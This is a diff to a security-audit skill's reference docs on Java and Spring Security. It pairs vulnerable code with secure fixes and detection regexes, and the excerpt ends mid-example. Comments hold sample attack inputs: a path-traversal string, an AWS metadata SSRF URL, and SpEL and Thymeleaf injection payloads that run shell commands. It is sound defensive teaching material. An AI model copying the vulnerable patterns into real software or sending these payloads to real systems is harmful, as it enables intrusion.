+SAXParserFactory spf = SAXParserFactory.newInstance();
+spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
+```
+
+**Security implication:** XXE (CWE-611) allows reading local files, SSRF, and denial of service via entity expansion. Java XML parsers are vulnerable by default. Always disable external entities and DTD processing.
+
+**Detection regex:** `DocumentBuilderFactory\.newInstance\s*\(`
+
+---
+
+### Command Injection via Runtime.exec
+
+Using `Runtime.exec` or `ProcessBuilder` with user-controlled arguments enables command injection.
+
+```java
+// VULNERABLE: User input in command execution
+String filename = request.getParameter("file");
+Runtime.getRuntime().exec("convert " + filename + " output.pdf");
+
+// VULNERABLE: ProcessBuilder with unsanitized input
+String host = request.getParameter("host");
+ProcessBuilder pb = new ProcessBuilder("ping", "-c", "4", host);
+Process p = pb.start();
+```
+
+```java
+// SECURE: Validate input against allowlist, never concatenate
+String filename = request.getParameter("file");
+if (!filename.matches("[a-zA-Z0-9_-]+\\.(png|jpg|gif)")) {
+    throw new IllegalArgumentException("Invalid filename");
+}
+// Use array form to avoid shell interpretation
+ProcessBuilder pb = new ProcessBuilder("convert", filename, "output.pdf");
+pb.redirectErrorStream(true);
+Process p = pb.start();
+
+// SECURE: Use library APIs instead of shell commands
+BufferedImage image = ImageIO.read(new File(validatedPath));
+```
+
+**Security implication:** Command injection (CWE-78) via `Runtime.exec` with string concatenation passes input through the shell, enabling command chaining. Use the array form of `ProcessBuilder` and validate inputs against strict patterns.
+
+**Detection regex:** `Runtime\.getRuntime\s*\(\s*\)\s*\.exec\s*\(`
+
+---
+
+### Path Traversal
+
+Constructing file paths from user input without validation allows directory traversal attacks.
+
+```java
+// VULNERABLE: Direct use of user input in file paths
+String filename = request.getParameter("file");
+File file = new File("/uploads/" + filename);
+// Attacker sends "../../etc/passwd"
+FileInputStream fis = new FileInputStream(file);
+```
+
+```java
+// SECURE: Validate canonical path stays within allowed directory
+String filename = request.getParameter("file");
+File baseDir = new File("/uploads").getCanonicalFile();
+File requestedFile = new File(baseDir, filename).getCanonicalFile();
+
+if (!requestedFile.toPath().startsWith(baseDir.toPath())) {
+    throw new SecurityException("Path traversal detected");
+}
+FileInputStream fis = new FileInputStream(requestedFile);
+
+// SECURE: Java NIO with path normalization
+Path basePath = Path.of("/uploads").toRealPath();
+Path resolved = basePath.resolve(filename).normalize().toRealPath();
+if (!resolved.startsWith(basePath)) {
+    throw new SecurityException("Path traversal detected");
+}
+```
+
+**Security implication:** Path traversal (CWE-22) allows reading or writing arbitrary files on the server. Always resolve to canonical/real paths and verify the result stays within the intended directory.
+
+**Detection regex:** `new\s+File\s*\(\s*[^)]*\+\s*(request|req|param|input|args)`
+
+---
+
+### Weak Cryptography
+
+Use of broken or weak cryptographic algorithms creates false sense of security.
+
+```java
+// VULNERABLE: MD5 is broken for integrity verification
+MessageDigest md = MessageDigest.getInstance("MD5");
+byte[] hash = md.digest(data);
+
+// VULNERABLE: SHA-1 is deprecated for security use
+MessageDigest sha1 = MessageDigest.getInstance("SHA-1");
+
+// VULNERABLE: DES is broken (56-bit key)
+Cipher cipher = Cipher.getInstance("DES/ECB/PKCS5Padding");
+
+// VULNERABLE: ECB mode leaks patterns
+Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding");
+
+// VULNERABLE: Insecure random for security-sensitive operations
+java.util.Random rand = new java.util.Random();
+String token = Long.toHexString(rand.nextLong());
+```
+
+```java
+// SECURE: SHA-256 or stronger
+MessageDigest sha256 = MessageDigest.getInstance("SHA-256");
+byte[] hash = sha256.digest(data);
+
+// SECURE: AES-GCM for authenticated encryption
+Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");
+GCMParameterSpec spec = new GCMParameterSpec(128, iv);
+cipher.init(Cipher.ENCRYPT_MODE, secretKey, spec);
+
+// SECURE: SecureRandom for security-sensitive operations
+SecureRandom random = new SecureRandom();
+byte[] token = new byte[32];
+random.nextBytes(token);
+String tokenStr = Base64.getUrlEncoder().withoutPadding().encodeToString(token);
+```
+
+**Security implication:** Weak hash algorithms (CWE-328) like MD5 and SHA-1 are vulnerable to collision attacks. DES (CWE-327) has insufficient key length. ECB mode (CWE-327) leaks data patterns. `java.util.Random` (CWE-338) is predictable and must not be used for tokens or keys.
+
+**Detection regex (MD5/SHA-1):** `getInstance\s*\(\s*"(MD5|SHA-1)"\s*\)`
+**Detection regex (DES/ECB):** `Cipher\.getInstance\s*\(\s*"(DES|.*ECB)`
+**Detection regex (insecure random):** `new\s+Random\s*\(`
+
+---
+
+### SSRF via URL.openConnection
+
+Using `URL.openConnection()` with user-controlled URLs enables Server-Side Request Forgery.
+
+```java
+// VULNERABLE: User-controlled URL in HTTP request
+String target = request.getParameter("url");
+URL url = new URL(target);
+HttpURLConnection conn = (HttpURLConnection) url.openConnection();
+// Attacker sends http://169.254.169.254/latest/meta-data/ (AWS metadata)
+```
+
+```java
+// SECURE: Validate URL against allowlist of hosts and schemes
+String target = request.getParameter("url");
+URL url = new URL(target);
+
+// Validate scheme
+if (!Set.of("http", "https").contains(url.getProtocol())) {
+    throw new SecurityException("Only HTTP(S) allowed");
+}
+
+// Validate host is not internal
+InetAddress addr = InetAddress.getByName(url.getHost());
+if (addr.isLoopbackAddress() || addr.isLinkLocalAddress()
+        || addr.isSiteLocalAddress() || addr.isAnyLocalAddress()) {
+    throw new SecurityException("Internal addresses not allowed");
+}
+
+HttpURLConnection conn = (HttpURLConnection) url.openConnection();
+conn.setInstanceFollowRedirects(false); // Prevent redirect-based bypass
+```
+
+**Security implication:** SSRF (CWE-918) allows attackers to reach internal services, cloud metadata endpoints, and other protected resources. Validate URLs against allowlists, block private IP ranges, and disable redirects.
+
+**Detection regex:** `(openConnection|openStream)\s*\(\s*\)`
+
+---
+
+## Java 11+
+
+### HttpClient SSRF Considerations
+
+Java 11 introduced `java.net.http.HttpClient`, a modern HTTP client. Like `URL.openConnection`, it is vulnerable to SSRF if the target URL is user-controlled.
+
+```java
+// VULNERABLE: HttpClient with user-controlled URI
+String target = request.getParameter("url");
+HttpClient client = HttpClient.newHttpClient();
+HttpRequest req = HttpRequest.newBuilder()
+    .uri(URI.create(target))
+    .build();
+HttpResponse<String> resp = client.send(req, HttpResponse.BodyHandlers.ofString());
+```
+
+```java
+// SECURE: Validate URI before use with HttpClient
+String target = request.getParameter("url");
+URI uri = URI.create(target);
+
+// Validate scheme and host
+if (!Set.of("http", "https").contains(uri.getScheme())) {
+    throw new SecurityException("Only HTTP(S) allowed");
+}
+InetAddress addr = InetAddress.getByName(uri.getHost());
+if (addr.isLoopbackAddress() || addr.isLinkLocalAddress()
+        || addr.isSiteLocalAddress()) {
+    throw new SecurityException("Internal addresses blocked");
+}
+
+HttpClient client = HttpClient.newBuilder()
+    .followRedirects(HttpClient.Redirect.NEVER) // Block redirect-based SSRF
+    .connectTimeout(Duration.ofSeconds(5))
+    .build();
+HttpRequest req = HttpRequest.newBuilder()
+    .uri(uri)
+    .timeout(Duration.ofSeconds(10))
+    .build();
+HttpResponse<String> resp = client.send(req, HttpResponse.BodyHandlers.ofString());
+```
+
+**Security implication:** The new `HttpClient` shares the same SSRF risks as legacy `URL.openConnection`. Apply the same validation — scheme allowlist, host allowlist, private IP blocking, and redirect prevention.
+
+**Detection regex:** `HttpClient\.new(HttpClient|Builder)\s*\(`
+
+---
+
+### Enhanced String Methods for Input Validation
+
+Java 11 adds `String.isBlank()`, `String.strip()`, and `String.lines()` that improve input handling.
+
+```java
+// VULNERABLE: Using trim() which only handles ASCII whitespace
+String input = request.getParameter("token");
+if (input != null && !input.trim().isEmpty()) {
+    // Unicode whitespace characters can bypass this check
+    processToken(input.trim());
+}
+```
+
+```java
+// SECURE: strip() handles all Unicode whitespace
+String input = request.getParameter("token");
+if (input != null && !input.strip().isBlank()) {
+    processToken(input.strip());
+}
+```
+
+**Security implication:** `trim()` only removes ASCII whitespace (`\u0020` and below), while `strip()` handles all Unicode whitespace characters. Attackers can use Unicode whitespace to bypass validation that relies on `trim()`.
+
+---
+
+## Java 14+
+
+### Records for Immutable Data Transfer
+
+Records provide immutable data carriers that eliminate entire classes of bugs related to mutable state.
+
+```java
+// VULNERABLE: Mutable DTO allows tampering after validation
+public class UserRequest {
+    private String username;
+    private String role;
+
+    // Setters allow modification after validation
+    public void setUsername(String u) { this.username = u; }
+    public void setRole(String r) { this.role = r; }
+    public String getUsername() { return username; }
+    public String getRole() { return role; }
+}
+
+// Validated, then attacker mutates before use
+UserRequest req = parseAndValidate(input);
+req.setRole("admin"); // TOCTOU — modify after validation
+```
+
+```java
+// SECURE: Record is immutable after construction
+public record UserRequest(String username, String role) {
+    // Compact constructor for validation at creation time
+    public UserRequest {
+        Objects.requireNonNull(username, "username required");
+        Objects.requireNonNull(role, "role required");
+        if (!Set.of("user", "editor", "viewer").contains(role)) {
+            throw new IllegalArgumentException("Invalid role: " + role);
+        }
+    }
+}
+
+// Cannot be modified after construction and validation
+UserRequest req = new UserRequest(username, role);
+// req has no setters — immutable by design
+```
+
+**Security implication:** Records enforce immutability, preventing TOCTOU (time-of-check-time-of-use, CWE-367) vulnerabilities where data is modified between validation and use. The compact constructor pattern ensures validation happens at construction time.
+
+---
+
+## Java 17+
+
+### Sealed Classes for Type Safety
+
+Sealed classes restrict which classes can extend them, enabling exhaustive type checking and preventing unauthorized extensions.
+
+```java
+// VULNERABLE: Open hierarchy allows unauthorized implementations
+public interface Permission { boolean isAllowed(); }
+
+// Attacker adds: class EvilPermission implements Permission {
+//     public boolean isAllowed() { return true; } // Always grants access
+// }
+```
+
+```java
+// SECURE: Sealed interface restricts implementations
+public sealed interface Permission permits ReadPermission, WritePermission, AdminPermission {
+    boolean isAllowed(User user, Resource resource);
+}
+
+public record ReadPermission() implements Permission {
+    public boolean isAllowed(User user, Resource resource) {
+        return resource.isPublic() || user.owns(resource);
+    }
+}
+
+public record WritePermission() implements Permission {
+    public boolean isAllowed(User user, Resource resource) {
+        return user.owns(resource);
+    }
+}
+
+public record AdminPermission() implements Permission {
+    public boolean isAllowed(User user, Resource resource) {
+        return user.isAdmin();
+    }
+}
+```
+
+**Security implication:** Sealed classes (CWE-284 prevention) ensure that the set of implementations is fixed at compile time. No external code can create a malicious implementation that bypasses security checks. Combined with pattern matching, the compiler enforces exhaustive handling.
+
+---
+
+### Pattern Matching for instanceof
+
+Pattern matching eliminates unsafe casts and enables exhaustive type checks.
+
+```java
+// VULNERABLE: Unchecked cast after instanceof
+if (obj instanceof String) {
+    String s = (String) obj;
+    // Risk: cast could be wrong if code is refactored
+}
+
+// VULNERABLE: Missing type check
+Object credential = getCredential();
+String password = (String) credential; // ClassCastException if not String
+```
+
+```java
+// SECURE: Pattern matching binds and casts safely
+if (obj instanceof String s) {
+    // s is already cast, no separate cast needed
+    process(s);
+}
+
+// SECURE: Exhaustive pattern matching with sealed types (Java 21)
+switch (permission) {
+    case ReadPermission r -> handleRead(r);
+    case WritePermission w -> handleWrite(w);
+    case AdminPermission a -> handleAdmin(a);
+    // Compiler ensures all cases are covered for sealed types
+}
+```
+
+**Security implication:** Pattern matching eliminates `ClassCastException` risks and, with sealed types, ensures all security-relevant cases are handled. The compiler verifies exhaustiveness.
+
+---
+
+## Java 21+
+
+### Virtual Threads Security Implications
+
+Virtual threads (Project Loom) change the concurrency model. While they improve scalability, they introduce new considerations for thread-local security state.
+
+```java
+// VULNERABLE: Thread-local security context may not propagate to virtual threads
+private static final ThreadLocal<SecurityContext> secCtx = new ThreadLocal<>();
+
+// In virtual thread, the security context may be missing
+Thread.startVirtualThread(() -> {
+    SecurityContext ctx = secCtx.get(); // May be null!
+    if (ctx == null || !ctx.isAuthenticated()) {
+        // Silently fails or throws — DoS risk
+    }
+});
+```
+
+```java
+// SECURE: Use ScopedValue (preview) for virtual-thread-safe context
+private static final ScopedValue<SecurityContext> SECURITY_CTX = ScopedValue.newInstance();
+
+ScopedValue.runWhere(SECURITY_CTX, authenticatedContext, () -> {
+    // Context is safely available in this scope and all child tasks
+    SecurityContext ctx = SECURITY_CTX.get();
+    processRequest(ctx);
+});
+
+// SECURE: Explicitly pass security context through structured concurrency
+try (var scope = new StructuredTaskScope.ShutdownOnFailure()) {
+    var ctx = SecurityContextHolder.getContext();
+    var future = scope.fork(() -> {
+        SecurityContextHolder.setContext(ctx);
+        return doSecureWork();
+    });
+    scope.join().throwIfFailed();
+    return future.get();
+}
+```
+
+**Security implication:** Virtual threads do not automatically inherit thread-local security contexts. This can lead to authentication/authorization bypass (CWE-862) if security state is stored in `ThreadLocal`. Migrate to `ScopedValue` or explicitly propagate security context.
+
+---
+
+### Record Patterns for Secure Destructuring
+
+Java 21 record patterns enable deep matching and destructuring of nested records, improving clarity of security checks.
+
+```java
+// SECURE: Record pattern matching for access control decisions
+sealed interface AuthResult permits Authenticated, Anonymous, Denied {}
+record Authenticated(User user, Set<Role> roles) implements AuthResult {}
+record Anonymous() implements AuthResult {}
+record Denied(String reason) implements AuthResult {}
+
+String handleRequest(AuthResult auth, Resource resource) {
+    return switch (auth) {
+        case Authenticated(var user, var roles) when roles.contains(Role.ADMIN) ->
+            adminAccess(user, resource);
+        case Authenticated(var user, var roles) when roles.contains(Role.USER) ->
+            userAccess(user, resource);
+        case Authenticated(_, _) ->
+            forbiddenResponse();
+        case Anonymous() ->
+            redirectToLogin();
+        case Denied(var reason) ->
+            deniedResponse(reason);
+    };
+}
+```
+
+**Security implication:** Record patterns with sealed types create a compile-time-verified, exhaustive decision tree for authorization logic. Every combination must be handled, reducing the risk of authorization bypass through unhandled cases.
+
+---
+
+## Detection Patterns for Auditing Java Security Features
+
+| Pattern | Regex | Severity | Checkpoint ID |
+|---------|-------|----------|---------------|
+| ObjectInputStream deserialization | `new\s+ObjectInputStream\s*\(` | error | SA-JAVA-01 |
+| XMLDecoder deserialization | `new\s+XMLDecoder\s*\(` | error | SA-JAVA-02 |
+| JNDI injection via InitialContext.lookup | `InitialContext\s*\(\s*\)[\s\S]{0,100}\.lookup\s*\(` | error | SA-JAVA-03 |
+| Reflection with Class.forName | `Class\.forName\s*\(` | warning | SA-JAVA-04 |
+| JDBC string concatenation | `(createStatement\|executeQuery\|executeUpdate)\s*\([^)]*\+` | error | SA-JAVA-05 |
+| XXE via DocumentBuilderFactory | `DocumentBuilderFactory\.newInstance\s*\(` | warning | SA-JAVA-06 |
+| Command injection via Runtime.exec | `Runtime\.getRuntime\s*\(\s*\)\s*\.exec\s*\(` | error | SA-JAVA-07 |
+| Path traversal via new File with input | `new\s+File\s*\(\s*[^)]*\+\s*(request\|req\|param\|input\|args)` | warning | SA-JAVA-08 |
+| Weak hash MD5 or SHA-1 | `getInstance\s*\(\s*"(MD5\|SHA-1)"\s*\)` | warning | SA-JAVA-09 |
+| Weak cipher DES or ECB mode | `Cipher\.getInstance\s*\(\s*"(DES\|.*ECB)` | error | SA-JAVA-10 |
+| Insecure random java.util.Random | `new\s+Random\s*\(` | warning | SA-JAVA-11 |
+| SSRF via openConnection | `(openConnection\|openStream)\s*\(\s*\)` | warning | SA-JAVA-12 |
+| SSRF via HttpClient | `HttpClient\.new(HttpClient\|Builder)\s*\(` | warning | SA-JAVA-13 |
+| Method.invoke reflection | `Method\.invoke\s*\(` | warning | SA-JAVA-14 |
+| Unsafe ProcessBuilder with user input | `new\s+ProcessBuilder\s*\(.*\+` | error | SA-JAVA-15 |
+
+## Version Adoption Security Checklist
+
+- [ ] Upgrade to Java 17+ for sealed classes and enhanced pattern matching
+- [ ] Replace `ThreadLocal` security state with `ScopedValue` for virtual threads (Java 21+)
+- [ ] Use `ObjectInputFilter` on all remaining `ObjectInputStream` usage
+- [ ] Replace mutable DTOs with records for validated, immutable data transfer
+- [ ] Verify all XML parsers disable external entities and DTD processing
+- [ ] Replace `java.util.Random` with `SecureRandom` for all security-sensitive uses
+- [ ] Migrate from DES/3DES to AES-GCM; from MD5/SHA-1 to SHA-256+
+- [ ] Use `PreparedStatement` exclusively; search for any `createStatement` usage
+- [ ] Audit all `Runtime.exec` and `ProcessBuilder` calls for user input
+- [ ] Use `Path.toRealPath()` and boundary checks for all file access with user input
+- [ ] Audit JNDI usage and restrict lookup names to an allowlist
+- [ ] Disable `XMLDecoder` usage or restrict to trusted internal data only
+- [ ] Configure `HttpClient` with `Redirect.NEVER` and validate all user-supplied URIs
+- [ ] Enable dependency vulnerability scanning (OWASP Dependency-Check, Snyk)
+
+## Related References
+
+- `owasp-top10.md` — OWASP Top 10 mapping
+- `cwe-top25.md` — CWE Top 25 mapping
+- `input-validation.md` — Input validation patterns
+- `javascript-security-features.md` — JavaScript security features
+- `php-security-features.md` — PHP security features
+
+## Changelog
+
+| Date | Change | Reason |
+|------|--------|--------|
+| 2026-03-31 | Initial release | Phase 2 — Multi-language security references |

--- a/skills/security-audit/references/java-security-features.md
+++ b/skills/security-audit/references/java-security-features.md
@@ -22,12 +22,13 @@ ois.setObjectInputFilter(ObjectInputFilter.Config.createFilter(
 ));
 Object obj = ois.readObject();
 
-// SECURE: Avoid Java serialization entirely — use JSON with explicit types
+// SECURE: Avoid Java serialization entirely — use JSON and bind to a
+// concrete type. Do NOT enable Jackson default typing; it reintroduces
+// polymorphic deserialization, which is the exact same gadget-chain
+// attack surface we are trying to remove. If polymorphism is genuinely
+// required, supply a strict PolymorphicTypeValidator that allowlists
+// specific base types and reject everything else.
 ObjectMapper mapper = new ObjectMapper();
-mapper.activateDefaultTyping(
-    mapper.getPolymorphicTypeValidator(),
-    ObjectMapper.DefaultTyping.NON_FINAL
-);
 UserDto user = mapper.readValue(input, UserDto.class);
 ```
 
@@ -647,23 +648,31 @@ String handleRequest(AuthResult auth, Resource resource) {
 
 ## Detection Patterns for Auditing Java Security Features
 
-| Pattern | Regex | Severity | Checkpoint ID |
-|---------|-------|----------|---------------|
-| ObjectInputStream deserialization | `new\s+ObjectInputStream\s*\(` | error | SA-JAVA-01 |
-| XMLDecoder deserialization | `new\s+XMLDecoder\s*\(` | error | SA-JAVA-02 |
-| JNDI injection via InitialContext.lookup | `InitialContext\s*\(\s*\)[\s\S]{0,100}\.lookup\s*\(` | error | SA-JAVA-03 |
-| Reflection with Class.forName | `Class\.forName\s*\(` | warning | SA-JAVA-04 |
-| JDBC string concatenation | `(createStatement\|executeQuery\|executeUpdate)\s*\([^)]*\+` | error | SA-JAVA-05 |
-| XXE via DocumentBuilderFactory | `DocumentBuilderFactory\.newInstance\s*\(` | warning | SA-JAVA-06 |
-| Command injection via Runtime.exec | `Runtime\.getRuntime\s*\(\s*\)\s*\.exec\s*\(` | error | SA-JAVA-07 |
-| Path traversal via new File with input | `new\s+File\s*\(\s*[^)]*\+\s*(request\|req\|param\|input\|args)` | warning | SA-JAVA-08 |
-| Weak hash MD5 or SHA-1 | `getInstance\s*\(\s*"(MD5\|SHA-1)"\s*\)` | warning | SA-JAVA-09 |
-| Weak cipher DES or ECB mode | `Cipher\.getInstance\s*\(\s*"(DES\|.*ECB)` | error | SA-JAVA-10 |
-| Insecure random java.util.Random | `new\s+Random\s*\(` | warning | SA-JAVA-11 |
-| SSRF via openConnection | `(openConnection\|openStream)\s*\(\s*\)` | warning | SA-JAVA-12 |
-| SSRF via HttpClient | `HttpClient\.new(HttpClient\|Builder)\s*\(` | warning | SA-JAVA-13 |
-| Method.invoke reflection | `Method\.invoke\s*\(` | warning | SA-JAVA-14 |
-| Unsafe ProcessBuilder with user input | `new\s+ProcessBuilder\s*\(.*\+` | error | SA-JAVA-15 |
+The `Regex` column is Markdown table syntax, so pipe characters in regex alternations are escaped as `\|` inside the cell. When you copy a pattern out of the table to run it standalone, unescape the `\|` back to `|`:
+
+```bash
+# As written in the table: getInstance\s*\(\s*"(MD5\|SHA-1)"\s*\)
+# As run:                   getInstance\s*\(\s*"(MD5|SHA-1)"\s*\)
+grep -rnP 'getInstance\s*\(\s*"(MD5|SHA-1)"\s*\)' --include='*.java' .
+```
+
+| Pattern | Regex | Severity |
+|---------|-------|----------|
+| ObjectInputStream deserialization | `new\s+ObjectInputStream\s*\(` | error |
+| XMLDecoder deserialization | `new\s+XMLDecoder\s*\(` | error |
+| JNDI injection via InitialContext.lookup | `InitialContext\s*\(\s*\)[\s\S]{0,100}\.lookup\s*\(` | error |
+| Reflection with Class.forName | `Class\.forName\s*\(` | warning |
+| JDBC string concatenation | `(createStatement\|executeQuery\|executeUpdate)\s*\([^)]*\+` | error |
+| XXE via DocumentBuilderFactory | `DocumentBuilderFactory\.newInstance\s*\(` | warning |
+| Command injection via Runtime.exec | `Runtime\.getRuntime\s*\(\s*\)\s*\.exec\s*\(` | error |
+| Path traversal via new File with input | `new\s+File\s*\(\s*[^)]*\+\s*(request\|req\|param\|input\|args)` | warning |
+| Weak hash MD5 or SHA-1 | `getInstance\s*\(\s*"(MD5\|SHA-1)"\s*\)` | warning |
+| Weak cipher DES or ECB mode | `Cipher\.getInstance\s*\(\s*"(DES\|.*ECB)` | error |
+| Insecure random java.util.Random | `new\s+Random\s*\(` | warning |
+| SSRF via openConnection | `(openConnection\|openStream)\s*\(\s*\)` | warning |
+| SSRF via HttpClient | `HttpClient\.new(HttpClient\|Builder)\s*\(` | warning |
+| Method.invoke reflection | `Method\.invoke\s*\(` | warning |
+| Unsafe ProcessBuilder with user input | `new\s+ProcessBuilder\s*\(.*\+` | error |
 
 ## Version Adoption Security Checklist
 

--- a/skills/security-audit/references/spring-security.md
+++ b/skills/security-audit/references/spring-security.md
@@ -1,0 +1,555 @@
+# Spring Security Patterns
+
+Security patterns, common misconfigurations, and detection regexes for Spring Boot / Spring Security applications.
+
+## Authentication & Authorization
+
+### Spring Security Misconfiguration — permitAll Overreach
+
+```java
+// VULNERABLE: Over-permissive security configuration
+@Configuration
+@EnableWebSecurity
+public class SecurityConfig {
+
+    @Bean
+    public SecurityFilterChain filterChain(HttpSecurity http) throws Exception {
+        http
+            .authorizeHttpRequests(auth -> auth
+                .requestMatchers("/api/**").permitAll()  // Entire API is open
+                .requestMatchers("/admin/**").permitAll() // Admin panel unprotected
+                .anyRequest().authenticated()
+            );
+        return http.build();
+    }
+}
+
+// SECURE: Explicit, least-privilege path matching
+@Configuration
+@EnableWebSecurity
+public class SecurityConfig {
+
+    @Bean
+    public SecurityFilterChain filterChain(HttpSecurity http) throws Exception {
+        http
+            .authorizeHttpRequests(auth -> auth
+                .requestMatchers("/api/public/**").permitAll()
+                .requestMatchers("/api/admin/**").hasRole("ADMIN")
+                .requestMatchers("/api/user/**").hasRole("USER")
+                .requestMatchers("/actuator/health").permitAll()
+                .anyRequest().authenticated()
+            );
+        return http.build();
+    }
+}
+```
+
+**Detection regex:** `requestMatchers\s*\(\s*"\/(api|admin)\/\*\*"\s*\)\s*\.\s*permitAll\s*\(\s*\)`
+**Severity:** error
+
+### @PreAuthorize Bypass via Missing @EnableMethodSecurity
+
+```java
+// VULNERABLE: @PreAuthorize annotations have no effect without enablement
+@RestController
+@RequestMapping("/api/admin")
+public class AdminController {
+
+    // This annotation is silently ignored!
+    @PreAuthorize("hasRole('ADMIN')")
+    @DeleteMapping("/users/{id}")
+    public ResponseEntity<Void> deleteUser(@PathVariable Long id) {
+        userService.deleteUser(id);
+        return ResponseEntity.noContent().build();
+    }
+}
+
+// Missing from configuration:
+// @EnableMethodSecurity  <-- MUST be present on a @Configuration class
+
+// SECURE: Enable method security explicitly
+@Configuration
+@EnableMethodSecurity(prePostEnabled = true, securedEnabled = true)
+public class MethodSecurityConfig {
+    // Method security annotations now enforced
+}
+
+@RestController
+@RequestMapping("/api/admin")
+public class AdminController {
+
+    @PreAuthorize("hasRole('ADMIN')")
+    @DeleteMapping("/users/{id}")
+    public ResponseEntity<Void> deleteUser(@PathVariable Long id) {
+        userService.deleteUser(id);
+        return ResponseEntity.noContent().build();
+    }
+}
+```
+
+**Detection regex:** `@PreAuthorize\s*\(`
+**Severity:** warning
+
+When `@PreAuthorize` is found, verify that `@EnableMethodSecurity` or the legacy `@EnableGlobalMethodSecurity` is declared on a `@Configuration` class. Without it, all method-level security annotations are silently ignored.
+
+## Injection
+
+### SpEL Injection
+
+```java
+// VULNERABLE: User input evaluated as SpEL expression
+@RestController
+public class SearchController {
+
+    private final ExpressionParser parser = new SpelExpressionParser();
+
+    @GetMapping("/search")
+    public Object search(@RequestParam String query) {
+        // Attacker sends: T(java.lang.Runtime).getRuntime().exec('whoami')
+        Expression exp = parser.parseExpression(query);
+        return exp.getValue();
+    }
+}
+
+// SECURE: Never parse untrusted input as SpEL; use SimpleEvaluationContext
+@RestController
+public class SearchController {
+
+    private final ExpressionParser parser = new SpelExpressionParser();
+
+    @GetMapping("/search")
+    public Object search(@RequestParam String filter) {
+        // Use SimpleEvaluationContext to restrict available types and methods
+        SimpleEvaluationContext context = SimpleEvaluationContext
+            .forReadOnlyDataBinding()
+            .withInstanceMethods()
+            .build();
+
+        // Only evaluate against a known root object, never raw user input
+        SearchCriteria criteria = new SearchCriteria();
+        Expression exp = parser.parseExpression("name");  // Fixed expression
+        return exp.getValue(context, criteria);
+    }
+}
+```
+
+**Detection regex:** `parseExpression\s*\(\s*[a-zA-Z_]\w*\s*\)`
+**Severity:** error
+
+### Thymeleaf Server-Side Template Injection (SSTI)
+
+```java
+// VULNERABLE: Dynamic template name from user input
+@Controller
+public class PageController {
+
+    @GetMapping("/page")
+    public String renderPage(@RequestParam String template) {
+        // Attacker sends: __${T(java.lang.Runtime).getRuntime().exec('id')}__::.x
+        return template;  // Thymeleaf evaluates this as a template expression
+    }
+}
+
+// VULNERABLE: Unsafe fragment expression with user input
+@Controller
+public class FragmentController {
+
+    @GetMapping("/fragment")
+    public String renderFragment(@RequestParam String section, Model model) {
+        return "page :: " + section;  // Attacker controls fragment expression
+    }
+}
+
+// SECURE: Use an allowlist for template/fragment names
+@Controller
+public class PageController {
+
+    private static final Set<String> ALLOWED_TEMPLATES = Set.of(
+        "home", "about", "contact", "faq"
+    );
+
+    @GetMapping("/page")
+    public String renderPage(@RequestParam String template) {
+        if (!ALLOWED_TEMPLATES.contains(template)) {
+            return "error/404";
+        }
+        return template;
+    }
+}
+```
+
+**Detection regex:** `return\s+(?:request|param|input|query|\w+)\s*;[\s\S]{0,5}$|return\s+"[^"]*"\s*\+\s*(?:request|param|input|\w+)`
+**Severity:** error
+
+### Jackson Deserialization — Polymorphic Typing
+
+```java
+// VULNERABLE: Default typing enabled globally
+@Configuration
+public class JacksonConfig {
+
+    @Bean
+    public ObjectMapper objectMapper() {
+        ObjectMapper mapper = new ObjectMapper();
+        // DANGEROUS: allows attacker to specify arbitrary class instantiation
+        mapper.enableDefaultTyping();
+        // Also dangerous:
+        // mapper.enableDefaultTyping(ObjectMapper.DefaultTyping.NON_FINAL);
+        // mapper.activateDefaultTyping(ptv, ObjectMapper.DefaultTyping.NON_FINAL);
+        return mapper;
+    }
+}
+
+// SECURE: Avoid default typing; use explicit type information
+@Configuration
+public class JacksonConfig {
+
+    @Bean
+    public ObjectMapper objectMapper() {
+        ObjectMapper mapper = new ObjectMapper();
+        // Do NOT enable default typing
+        // Use @JsonTypeInfo on specific classes where polymorphism is needed
+        return mapper;
+    }
+}
+
+// SECURE: If polymorphism is required, use allowlist-based typing
+@JsonTypeInfo(use = JsonTypeInfo.Id.NAME, property = "type")
+@JsonSubTypes({
+    @JsonSubTypes.Type(value = EmailNotification.class, name = "email"),
+    @JsonSubTypes.Type(value = SmsNotification.class, name = "sms")
+})
+public abstract class Notification {
+    // Only explicitly listed subtypes are allowed
+}
+```
+
+**Detection regex:** `enableDefaultTyping\s*\(|activateDefaultTyping\s*\(`
+**Severity:** error
+
+## Security Misconfiguration
+
+### Actuator Endpoint Exposure
+
+```yaml
+# VULNERABLE: application.yml — all actuator endpoints exposed without auth
+management:
+  endpoints:
+    web:
+      exposure:
+        include: "*"
+  endpoint:
+    env:
+      show-values: ALWAYS
+    configprops:
+      show-values: ALWAYS
+
+# This exposes: /actuator/env (secrets), /actuator/configprops, /actuator/heapdump,
+# /actuator/threaddump, /actuator/jolokia, /actuator/beans, /actuator/mappings
+
+# SECURE: Only expose health and info; secure the rest
+management:
+  endpoints:
+    web:
+      exposure:
+        include: health,info,prometheus
+  endpoint:
+    health:
+      show-details: when-authorized
+    env:
+      show-values: NEVER
+    configprops:
+      show-values: NEVER
+```
+
+```java
+// SECURE: Require admin role for sensitive actuator endpoints
+@Configuration
+@EnableWebSecurity
+public class SecurityConfig {
+
+    @Bean
+    public SecurityFilterChain filterChain(HttpSecurity http) throws Exception {
+        http
+            .authorizeHttpRequests(auth -> auth
+                .requestMatchers("/actuator/health", "/actuator/info").permitAll()
+                .requestMatchers("/actuator/**").hasRole("ADMIN")
+                .anyRequest().authenticated()
+            );
+        return http.build();
+    }
+}
+```
+
+**Detection regex:** `include\s*:\s*["']?\*["']?|exposure\.include\s*=\s*\*`
+**Severity:** error
+
+### CSRF Configuration — Unsafe Disabling
+
+```java
+// VULNERABLE: CSRF protection disabled entirely
+@Configuration
+@EnableWebSecurity
+public class SecurityConfig {
+
+    @Bean
+    public SecurityFilterChain filterChain(HttpSecurity http) throws Exception {
+        http
+            .csrf(csrf -> csrf.disable())  // Disables CSRF for all endpoints
+            .authorizeHttpRequests(auth -> auth.anyRequest().authenticated());
+        return http.build();
+    }
+}
+
+// SECURE: Disable CSRF only for stateless API endpoints, keep for browser sessions
+@Configuration
+@EnableWebSecurity
+public class SecurityConfig {
+
+    @Bean
+    @Order(1)
+    public SecurityFilterChain apiFilterChain(HttpSecurity http) throws Exception {
+        http
+            .securityMatcher("/api/**")
+            .csrf(csrf -> csrf.disable())  // OK for stateless JWT API
+            .sessionManagement(session ->
+                session.sessionCreationPolicy(SessionCreationPolicy.STATELESS))
+            .authorizeHttpRequests(auth -> auth.anyRequest().authenticated())
